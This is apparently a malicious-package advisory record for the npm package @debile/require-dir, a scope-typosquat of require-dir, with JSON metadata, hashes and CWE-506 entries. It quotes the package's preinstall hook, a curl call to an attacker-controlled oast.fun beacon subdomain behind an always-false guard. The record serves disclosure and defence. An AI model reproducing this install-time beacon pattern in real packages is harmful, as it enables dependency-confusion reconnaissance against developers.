-= Per source details. Do not edit below this line.=-
Package @debile/require-dir republishes the code of the well-known require-dir package under a different scope. Its package.json preinstall script runs bash -c 'if [[ 1 == 2 ]]; then curl https://xgtktsypnmotaeqmgvdmsn0l1hg0yewow.oast.fun; fi', which stages an Interactsh (oast.fun) out-of-band beacon in the install lifecycle. The curl is gated behind an always-false [[ 1 == 2 ]] guard, so no request is actually issued on install of this version, but the preinstall hook, the attacker-controlled OAST subdomain, and the scope-typosquat of a popular package (require-dir) together form a dependency-confusion / install-time recon probe. Flipping a single character in the guard converts the current release into a live install-time beacon to an attacker-controlled interaction server.
{
"malicious-packages-origins": [
{
"source": "amazon-inspector",
"id": "IN-MAL-2026-010619",
"import_time": "2026-07-15T05:49:44.13968795Z",
"sha256": "21f83d8be7d017ab502834020238f7311220ea6123433fd93f97ef3cd3ee20cc",
"versions": [
"1.9.1"
],
"modified_time": "2026-07-15T04:32:04Z"
},
{
"id": "IN-MAL-2026-010620",
"source": "amazon-inspector",
"import_time": "2026-07-15T05:49:44.24387987Z",
"sha256": "3075732c05c8b941b57fed9e8fe9c788b28f9ff6fe9ef91936d1802f568c594e",
"versions": [
"1.9.2"
],
"modified_time": "2026-07-15T04:32:14Z"
}
]
}"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@debile/require-dir/MAL-2026-10654.json"
[
{
"name": "Embedded Malicious Code",
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature."
},
{
"name": "Embedded Malicious Code",
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature."
}
]
{
"evidence_files": [
{
"path": "package.json",
"sha256": "0210cb6367bd5e780095e81111db99fab73b24afa59a716a69183117e91f7943",
"tlsh": "00f04e51ce94d9a316c426c4ac694462a122894b8a58fc0ef3c3012d874d5ab127d179"
}
]
}